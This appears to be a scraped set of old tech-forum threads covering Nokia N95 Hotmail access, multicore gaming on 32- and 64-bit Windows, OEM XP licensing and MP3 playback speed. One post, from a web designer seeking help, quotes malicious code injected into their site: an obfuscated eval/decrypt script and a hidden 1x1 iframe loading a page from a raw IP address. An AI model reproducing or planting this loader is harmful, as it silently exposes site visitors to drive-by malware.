Might not technically be a computer related question, LT, but given that you've got an N95, can you tell me why hotmail cannot be accessed on the phone? Instead you get a screen advising you to turn on cookies, yet cookies is already enabled.

I believe they use AJAX scripting for Hotmail now, which the internal N95 browser has all kinds of troubles with, plus its cookie handling is so-so. I can't browse the forum from the default browser, I have to use Opera Mini for that.
Go into your menu, go to Applications -> Downloads, and grab Windows Live. That installs a Hotmail inbox in your Messaging section (where your SMS inbox and POP3 email accounts, etc. are). That should do the job without you having to log into the web interface. ![]()

PC Multicore Gaming Question
There's a bit of confusion in the office about gaming using multicore chips.
Does a game that's written (optimised) for multicore chips require the underlying operating system to be 64 bit to fully utilise the multicore chips? So, I guess what I'm asking is - does the software of the application utilise the multicore or does the underlying o/s determine it or is it combination? I'm leaning on the combination and not specifically the o/s. So, if I have a quad system and playing Crysis (which is written for multicore architecture), does it differ greatly when running it on XP/Vista 32bit to when running it on Vista 64? (Note: I'm not asking if the game will run - of course it will run) Any links would be handy. A lot of forums have misleading or confusing information.

Win XP recognises DUal core CPU's. If the game supports XP and dual cpu, then it will use both CPU's. I know that my recording software uses both cores running under 32bit XP but it won't recognise my 8gb of RAM... Vista 64 does though. This program is handy;
http://www.koma-code.de/index.php?op...d=88&Itemid=93 when I play a single thread game/app, I right click and isolate that program so it gets a dedicated core to run on. You can use it to tell a multi thread app to use 2 or 4 cores as well. |

I touched on this a few months ago, but is there any way I can use my existing OEM version of XP if I buy a new computer? I don't fancy buying it again, and am hoping to get a new PC in the next month or so.

Okay, having a bit of an issue.
A site that i'm about to redesign is giving a "Virus found JS/Downloader agent" error when you open it. In the htm file online there is a line at the bottom that is not in my original design Code:
<script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[X1hIZQQFx;;MuM./z.3z.MMM;~5lX;`Y(i9.FZF[g`(QZIm[Zi`lZQIm><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));</script>
Here is part of the code: Code:
<iframe height="1" width="1" src="http://202.75.35.222/bags/index.php"><html class="blacklist" xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all"> </link> <link id="favicon" rel="icon" type="image/png" href="chrome://global/skin/icons/blacklist_favicon.png"/> <script type="application/javascript" src="chrome://global/content/strres.js"> </script> <script type="application/javascript"> </script> <style type="text/css"> </style> </head> <body dir="ltr"> <div id="errorPageContainer"> <div id="errorTitle"> </div> <div id="errorLongContent"> </div> <div id="ignoreWarning"> </div> </div> <script type="application/javascript"> 1initPage(); </script> </body> </html> </iframe> |

Not really a computer question per se, but I know a few people have Nokia N95's so I figured I'd ask this here. Has anyone tried to transfer MP3's to the phone? For some bizarre reason, whenever I put a song on my phone, it gets speed up to chipmunk speed. While great as a novelty, it's quickly become very annoying!
I've read around and most people who have had this issue have used the aac converter that came with the phone, whereas I've just directly put the original mp3 onto it with no conversion

OK, I've had no problems at all with MP3s of any bitrate. Are you using the inbuilt N95 player or a different one like Core Player?

The first bit is interesting how it got there in the first place, though! |
